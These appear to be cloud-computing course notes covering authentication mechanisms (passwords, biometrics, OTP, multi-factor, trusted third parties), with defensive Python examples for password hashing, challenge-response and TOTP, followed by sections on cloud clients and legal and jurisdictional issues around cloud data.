User authentication is generally based on three factors: something the user knows, something the user is, and something the user possesses. Something the user knows may be a password, a passphrase, a PIN or the answer to a secret question. Face recognition, iris scan and other methods based on body characteristics establish who the user is. Finally, something the user possesses may be a smart card, a software token or a mobile phone. When authentication combines two or more of these factors it is called two-factor or multi-factor authentication.

3.2.1. General mechanisms used in Authentication:

3.2.1.1. Authentication by password

The login and the password are confidential information that the user employs to access a specific service (mailbox, shopping sites, etc.). This is the weakest authentication and identification mechanism, because the password can be intercepted in transit, captured as it is typed on the keyboard, or guessed.

· Typology of passwords

•Simple and easy to remember password: The choice of password is often left to the user, and most users pick something easy to remember. Such passwords are also easy to guess.

•Complex passwords: A complex password is hard to guess. It combines numbers and letters, with uppercase and special characters, and is long enough to resist brute force.

•Identifiers and passwords with a lifetime: Although complex passwords are more secure than simple ones, several mechanisms can be used to break them. To reinforce the security policy, a password expiration period can be imposed, so that a stolen password cannot be used indefinitely.

•One time password (OTP): With the OTP mechanism each password is unique, automatically generated, random and usable only once. For each access request a new password is sent to the user via SMS or email, or generated by an authenticator app or hardware token; the latter are preferred, since SMS can be intercepted or redirected by SIM swapping.

•Encrypted password: During communication between user and server the password is sent over an encrypted channel (for example TLS) so that it is not revealed to a third party who intercepts or records the traffic. On the server side, passwords must be stored as salted hashes, never in clear text.

· Uses of passwords

•Unique password: Single sign-on lets the user access all services and applications with one credential; for example, one password can be used to access both the mailbox and a social network. That single password must then be strong and well protected, since compromising it compromises every service behind it.

•Multiple passwords: Using multiple passwords means one password per service, chosen according to the confidentiality of the secret it protects.
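As an added example (not from the original notes), the following Python code shows how a server should store the passwords discussed above: a policy check that rejects the "simple" type, and storage as a salted PBKDF2-HMAC-SHA256 hash with a constant-time verification. The iteration count and the small list of common passwords are assumptions chosen for the example.

```python
"""Salted password hashing with PBKDF2-HMAC-SHA256 and a simple policy check (added example)."""
import base64
import hashlib
import hmac
import os
import string

ITERATIONS = 600_000          # assumption: tune so one hash costs ~100 ms on the login server
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein"}   # constructed sample list


def is_weak(password: str) -> bool:
    """Reject short, single-class or well-known passwords (the 'simple' type above)."""
    classes = [
        any(c in string.ascii_lowercase for c in password),
        any(c in string.ascii_uppercase for c in password),
        any(c in string.digits for c in password),
        any(c in string.punctuation for c in password),
    ]
    return len(password) < 12 or sum(classes) < 3 or password.lower() in COMMON_PASSWORDS


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash' with a fresh random salt per password."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(candidate, base64.b64decode(dk_b64))


if __name__ == "__main__":
    pw = "Tr0ub4dor&3!x"
    print("weak?", is_weak(pw))
    stored = hash_password(pw)
    print(stored)
    print("login ok:", verify_password(pw, stored), "| wrong:", verify_password("password", stored))
```

Because each record carries its own random salt, two users with the same password get different stored values, so a leaked database cannot be attacked with one precomputed table, and the iteration count recorded in the record lets you raise the work factor later without invalidating old hashes.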

3.2.1.2. Authentication by Captcha or image scan

•Captcha: This is a sequence of characters that the user must type to prove that he is not a robot.

•Image scan: When a user is logged in to a service from a laptop and wants to connect from a smartphone, the system shows an image (typically a QR code) that the smartphone scans to access the service without repeating the whole authentication procedure.

3.2.1.3. Authentication by address, MAC or IP

•Authentication by MAC address: Authentication by MAC address authenticates the machine, not the person. It is convenient for users who normally access their accounts from a fixed set of machines, but a MAC address is trivially spoofed, so it should only supplement, never replace, user authentication.

•Authentication by IP address: Authentication succeeds or fails depending on the network from which the access request originates. Like MAC filtering this is a coarse check, since addresses can be spoofed or shared (NAT, VPN).

3.2.1.4. Biometrics

Biometrics illustrated in Fig. 2 can be used to identify a user through his physiological characteristics such as face, iris and fingerprint, or behavioral characteristics such as gestures and signature. Everyone has his own unique biometric feature. However, it can change over time (age, accident, injury, etc.).

Fig. 2. Biometrics

· Methods based on physical characteristics

•Face recognition: Authentication by face recognition is a widespread technique. The significant features for face recognition are the eyes, the mouth and the face shape. During identification, the low-frequency components of the image contribute to the overall description and allow the sex of the user to be determined, whereas the high-frequency components are more important for the authentication task.

•Iris scan: The detailed texture of the iris is specific to each individual. Moreover, this texture is stable and cannot be modified without a significant loss of vision.

•Finger scan: This is one of the first biometrics used for authentication, and the most mature technology. Fingerprints are unique to each person, and even to each finger. The fingerprint image is captured using a dedicated image acquisition device.

· Methods based on behavioral characteristics

•Gesture scan: Authentication is performed by hand gestures; specifically, the fingers may be positioned in the shape of a V, a W, etc.

•Digital signature: A signature consists of a fixed part and a variable part. Signature-based authentication identifies a user from the fixed part of the signature, from the pressure exerted with the pen and from the writing speed. This solution requires touch-screen equipment and a stylus.

3.2.1.5. Data encryption

This is a strong form of authentication that prevents identity theft and the replay of a previous authentication. It implements a proof of possession of a secret element (a cryptographic key) by means of an authentication protocol that guarantees the confidentiality of that secret element. Encryption is also an indispensable tool for protecting information in computer systems.
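As an added illustration of the proof-of-possession protocol described above (example code written for these notes, not taken from the original material), the following Python sketch has a server issue a random challenge and a client answer it with an HMAC computed from a pre-shared key; the key itself is never transmitted. The shared key, the SHA-256 HMAC, the 30-second challenge lifetime and the user name "alice" are assumptions, not anything specified in the notes. The demo shows why this defeats replay: a captured (challenge, response) pair is useless a second time, a response computed without the key fails, and a response that arrives after the lifetime has expired is refused as well.

```python
import hashlib
import hmac
import os
import time

# Constructed example: both sides hold the same secret key, provisioned out of band.
# Authentication = proving possession of that key by answering a fresh challenge
# with HMAC(key, challenge). Only the challenge and the HMAC cross the network.

CHALLENGE_TTL = 30  # seconds a challenge stays valid (assumed value)


class Server:
    def __init__(self, users):
        self.users = users      # user id -> shared secret key (bytes); constructed fixture
        self.pending = {}       # user id -> (nonce, time issued)
        self.used = set()       # nonces already consumed, so a replay is rejected

    def issue_challenge(self, user, now=None):
        """Step 1: server -> client. A fresh random nonce, or None for unknown users."""
        if user not in self.users:
            return None
        nonce = os.urandom(16)
        self.pending[user] = (nonce, time.time() if now is None else now)
        return nonce

    def verify(self, user, nonce, response, now=None):
        """Step 3: server checks the client's answer. Every nonce answers at most once."""
        now = time.time() if now is None else now
        entry = self.pending.pop(user, None)
        if entry is None:
            return False                       # no challenge outstanding for this user
        issued_nonce, issued_at = entry
        if nonce != issued_nonce or nonce in self.used:
            return False                       # wrong challenge, or one already consumed
        self.used.add(nonce)                   # consume it whether or not the answer is right
        if now - issued_at > CHALLENGE_TTL:
            return False                       # answered too late: authentication duration exceeded
        expected = hmac.new(self.users[user], nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant-time comparison


def client_respond(key, nonce):
    """Step 2: client -> server. Proof of possession of `key` without revealing it."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def run_demo():
    """Runs the exchange in four situations and returns the verifier's decisions."""
    alice_key = os.urandom(32)                 # constructed: shared with alice's device
    server = Server({"alice": alice_key})

    # 1. Genuine exchange: challenge, HMAC answer, accepted.
    nonce = server.issue_challenge("alice")
    response = client_respond(alice_key, nonce)
    genuine = server.verify("alice", nonce, response)

    # 2. Replay: the same captured (nonce, response) pair is presented again.
    replay = server.verify("alice", nonce, response)

    # 3. Party without the key: cannot compute the expected HMAC for a new challenge.
    nonce2 = server.issue_challenge("alice")
    no_key = server.verify("alice", nonce2, client_respond(b"not the key", nonce2))

    # 4. Expired challenge: a correct answer that arrives after CHALLENGE_TTL.
    t0 = 1_000_000.0
    nonce3 = server.issue_challenge("alice", now=t0)
    expired = server.verify("alice", nonce3, client_respond(alice_key, nonce3),
                            now=t0 + CHALLENGE_TTL + 1)

    return {"genuine": genuine, "replay": replay, "no_key": no_key, "expired": expired}


if __name__ == "__main__":
    print(run_demo())
```

Because the nonce is random and single-use, an eavesdropper who records a successful exchange learns nothing that lets them authenticate later, which is exactly the replay resistance the paragraph above claims for key-based authentication.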

3.2.1.6. Two factor and multi-factor authentication

Two-factor or multi-factor authentication provides strong authentication by combining two or more of the solutions presented above.
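The following added example (not code from the notes) combines two of the mechanisms above into a two-factor login: a knowledge factor (a password, stored as a salted PBKDF2 hash) and a possession factor (a time-based one-time password derived from a secret shared with the user's phone, following RFC 4226 and RFC 6238). The RFC test key 12345678901234567890, the 30-second time step, the one-step clock-skew window and the PBKDF2 iteration count are assumptions chosen for illustration. It goes a little beyond the one-sentence definition above by also showing the OTP replay rule from RFC 6238 (a code that has been accepted once is never accepted again) and by evaluating both factors before deciding, so a failure does not reveal which factor was wrong.

```python
import hashlib
import hmac
import os
import struct

# Added example: two-factor login = password (knowledge) + TOTP (possession).
# HOTP/TOTP per RFC 4226 / RFC 6238 with HMAC-SHA1 and 6 digits.

TIME_STEP = 30          # seconds per TOTP step (RFC 6238 default; assumed here)
PBKDF2_ROUNDS = 200_000  # assumed iteration count for the password hash


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for one counter value."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = TIME_STEP) -> str:
    """Time-based OTP (RFC 6238): HOTP with counter = floor(time / step)."""
    return hotp(secret, unix_time // step)


def verify_totp(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the code for the current step or +/- `window` steps (clock skew)."""
    counter = unix_time // TIME_STEP
    for delta in range(-window, window + 1):
        if hmac.compare_digest(hotp(secret, counter + delta), code):
            return True
    return False


def hash_password(password: str, salt: bytes = None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest) for storage."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


class MfaAccount:
    def __init__(self, password: str, totp_secret: bytes):
        self.salt, self.digest = hash_password(password)   # knowledge factor, hashed
        self.totp_secret = totp_secret                    # possession factor, shared with device
        self.used_codes = set()                           # codes already accepted once

    def login(self, password: str, code: str, unix_time: int) -> bool:
        # Check both factors unconditionally: the response time must not reveal which failed.
        pw_ok = verify_password(password, self.salt, self.digest)
        otp_ok = verify_totp(self.totp_secret, code, unix_time) and code not in self.used_codes
        if pw_ok and otp_ok:
            self.used_codes.add(code)      # RFC 6238 5.2: never accept the same OTP twice
            return True
        return False


def run_demo():
    """Four login attempts against one account; returns the outcome of each."""
    rfc_secret = b"12345678901234567890"     # RFC 4226/6238 test key (constructed fixture)
    account = MfaAccount("correct horse battery staple", rfc_secret)
    t = 59                                   # RFC 6238 test time: counter 1 -> code 287082
    good_code = totp(rfc_secret, t)
    return {
        "both_factors": account.login("correct horse battery staple", good_code, t),
        "replayed_code": account.login("correct horse battery staple", good_code, t),
        "wrong_password": account.login("wrong", totp(rfc_secret, t + 30), t + 30),
        "wrong_code": account.login("correct horse battery staple", "000000", t + 30),
    }


if __name__ == "__main__":
    print(run_demo())
```

A practitioner can check the OTP part against the published vectors: with the RFC test key, counter 0 gives 755224 and counter 1 gives 287082, which is also the 6-digit TOTP at Unix time 59. Note that the password and the OTP are independent secrets; compromising the hashed password database alone does not yield the TOTP seed, and a captured OTP is both short-lived and single-use.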

3.2.1.7. Multilevel authentication

Multilevel authentication reinforces security by authenticating the user at several levels. The authentication process is carried out, for example, at the organization level, then at the team level, and finally at the user level.

3.2.1.8. Authentication duration

Regardless of the authentication method used, when the user fails to authenticate within the defined authentication duration, the attempt is recorded as fraudulent and access is refused thereafter.

3.2.2. Models specific to Cloud

3.2.2.1. Trust

Trust is currently used in Cloud Computing as a means of authentication. Depending on the adopted security policy and the user's trust level, which is derived from his behavior, authentication is accepted or refused.

3.2.2.2. Trusted third party (TTP)

A trusted third party (TTP) is an entity used in the context of the Cloud to facilitate and secure interactions between two parties (consumer and provider) that both trust this third party. It can manage authentication, control access to resources, and more.

Table 3. Advantages and disadvantages of authentication models and mechanisms.

| Authentication models and mechanisms | Advantages | Disadvantages |
|---|---|---|
| General models and mechanisms | | |
| Password: simple password | Cost-effective. Easy to use and retain. | Easy for an attacker to find. |
| Password: complex password | Difficult to guess. | Forgetfulness. Not very robust; reusable by an attacker. |
| Password: password with lifetime | A password discovered by a malicious user will not be usable indefinitely. | Possibility of discovering it again after each renewal. |
| Password: OTP | No forgetting and no reuse; dynamism and randomization. | Little comfort of use. The password may be used by an attacker before the legitimate person. |
| Password: encrypted password | Difficult to intercept. | Possibility of being seen when typed, and of the authentication reply being observed. |
| Password: unique password | Easy authentication and password memorization. | The hacking of one account involves the hacking of all other accounts at once. |
| Password: multiple passwords | The hacking of one account does not impact other accounts. | Difficult to remember. |
| Captcha/scan: captcha | Countermeasure against DoS attacks. | Insecure method. |
| Captcha/scan: image scan | Flexibility and simplicity. | The image shown on the computer may be scanned by a nearby attacker. |
| MAC/IP address: MAC address | Simple filtering. Authentication is authorized for a limited number of machines. | An attacker gaining access to the authenticated machine. Tedious in a large network. |
| MAC/IP address: IP address | Simple to use. | Problem when the user needs to connect from another network. |
| Biometrics: face recognition | No forgetfulness. | Variations caused by makeup, aging and expression of emotions. Easily counterfeited. Need for a camera. |
| Biometrics: iris scan | Less constraining solution. | The iris pattern may be photographed for later impersonation. Necessity to purchase the device. |
| Biometrics: finger scan | Mature technology, less intrusive, relatively fast processing. | Need for a specific image acquisition device. Problem in the case of injured or dirty fingers. |
| Biometrics: gesture scan | Easy to use. | Need for a camera. |
| Biometrics: digital signature | Easy to remember. | Necessity of a touch screen. The writing changes during the life of the individual. |
| Encrypted data | High-level authentication. | Computation time. Unable to manage and inspect the client process. |
| Multi-factor authentication | Strong authentication. | Complex. |
| Multilevel authentication | Authentication verified on several levels. | An authentication problem at the highest level (organization) impacts the authentication of all users. |
| Authentication duration | Secures user accounts. | Even a genuine user who has difficulty connecting will be impacted. |
| Models specific to Cloud | | |
| Trust | Dynamic management of authentication corresponding to the user's behavior. | Not sufficient: the behavior of the user may change over time. |
| TTP | Management of authentication by a neutral third party. | Difficulty of choosing the trusted third party. |

11. Client access in cloud:

A Cloud Client consists of computer hardware and/or software that relies on cloud computing for application delivery. A Cloud Client could also be specifically designed for delivery of cloud services. In either case, the Cloud Client is essentially useless without Cloud Services. Examples of Cloud Clients include some computers, phones and other devices, operating systems and browsers.

Users access cloud services by using networked cloud client devices, such as desktop computers, laptops, tablets and smartphones. Some cloud clients rely on cloud computing for all or a majority of their applications so as to be essentially useless without it. Examples are thin clients and the browser-based Chromebook. Many cloud applications do not require specific software on the client and instead use a web browser to interact with the cloud application. With Ajax and HTML5 these Web user interfaces can achieve a similar or even better look and feel as native applications. Some cloud applications, however, support specific client software dedicated to these applications (e.g., virtual desktop clients and most email clients). Some legacy applications (line of business applications that until now have been prevalent in thin client Windows computing) are delivered via a screen-sharing technology.

12. Jurisdictional issues raised by data location :

The legal issues that frequently arise in the cloud are wide-ranging. However, attempting a broad generalisation, mainly four types of issues arise therein:

1. Privacy of data and data security

2. Issues relating to contractual relation between the cloud service provider and the customer

3. Complex jurisdictional issues, or issues relating to the location of the data and the set of laws applicable

4. Commercial as well as business considerations

At the outset, it may very well be clarified that though cloud computing enables the customer access to computing, networking, storage resources just like traditional outsourcing services and Application Service Providers (ASPs), it has a legal nature quite different from these two owing to its distinctive features like ‘on-demand access’, and ‘unit-based pricing’ (pay-per-use).

Privacy and data security issues:

Seemingly, the main privacy/data security issue relating to the cloud is ‘data breach’. Data breach may be in the generic sense defined as the loss of unencrypted electronically stored personal information (Buyya, Broberg, & Goscinski, 2015). A data breach can cause loss to both the provider as well as the customer in numerous ways; with identity theft and chances of debit/credit card fraud to the customer, and financial harm, loss of customer, loss of reputation, potential lawsuits et cetera for the provider.

American law requires that affected persons be notified in the case of a data breach; almost all states in the United States now require such notification.

In the Indian scenario, most providers attempt to lessen their liability in the case of a data breach. However, as more sensitive information enters the cloud every day, businesses and corporations have started negotiating contract terms that expand the contractual obligations of the providers.

A problem arises when data is subject to more than one jurisdiction and those jurisdictions have different data privacy laws. For example, the European Union Data Privacy Directive clearly states that ‘Data cannot leave the EU unless it goes to a country that ensures an “adequate level of protection”.’ Although such a statement makes the EU provisions easily enforceable, it restricts data movement and thereby reduces data efficiency.

Contracting Issues:

Clearly, licensing agreements are fundamentally different from Service agreements. Cloud essentially, in all its permutations (IaaS, PaaS, SaaS), is a service, and therefore is governed by a Service agreement instead of a Licensing agreement.

However, the main issue regarding Cloud Service agreements is the ‘contract of adhesion’. Owing to the limited expansion of Cloud Services in India, the ‘click-wrap agreement’ model is used most of the time, making the contract one of adhesion: it leaves little or no scope for negotiation on the part of the user/customer.

With the expansion of the Cloud computing, gradually the negotiation power of the large corporation will cause the Cloud Contracts to be standard and negotiated ones. However, at an individual level, this is still a far destination.

Legal provisions clearly cannot force the cloud providers to have a negotiating session with each and every customer. However, legal provisions may be made to ensure that the liability and risk responsibility clauses follow a standard pattern which compensates the user for the lack of negotiation during the formation of the contract.

Jurisdictional Issues:

Jurisdiction is the authority of a court to judge acts committed in a certain territory. Jurisdiction in case of legal issues relating to the Cloud services becomes difficult and critical because of the features of Cloud like ‘Virtualization’, and ‘Multi-tenancy’.

While virtualization ensures the requirement of less hardware and consumption of less power thereby ensuring computing efficiency, it also on the other hand makes it difficult for the cloud user or the cloud provider to know what information is housed on various machines at any given time.

Multi-tenancy refers to the ability of a cloud provider to deliver services to many individuals or organisations from a single shared software. The risk with this is that it makes it highly possible that the data of one user may be accessed in an unauthorised manner by another user since the data of various users are only virtually separated and not physically. Also, it makes it difficult to back up and restore data.

The cloud enables a great deal of flexibility in data location, which ensures maximum efficiency in data usage and accessibility. However, it also creates a number of legal issues. It is quite possible that the same data is stored in multiple locations at a given time. If those locations fall under different jurisdictions and different legal systems, the legal provisions regarding the data in the two locations may conflict. This gives rise to most of the jurisdictional issues in Cloud computing.

Also, laws relating to confidentiality and Government access to data are different across different nations. While the Indian laws manage to strike a balance between national security and individual privacy, most of the nations do not prefer a balance and have adopted a biased view on this. Problem of conflict of laws arises herein, in such cases.

Commercial and Business Considerations:

Other commercial and business considerations, such as the urge to minimize risk, to maintain data integrity, accessibility and availability, and Service Level Agreements, have also significantly shaped the present and the future of Cloud Computing in India. They also create a number of foreseeable as well as unforeseeable issues that need to be addressed by dedicated legislation.

It is an accepted truth that Law always lags behind technical innovations, and the complexities of the Cloud innovations and related Cloud Services like Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) will force the law and legislations to catch up in order for an effective legal system that provides legal remedies to prevent and redress the resultant harms.

Raising awareness, ensuring universal access to information and mobilizing resources are complementary measures that will only add to the effectiveness of the legal system in the Indian scenario.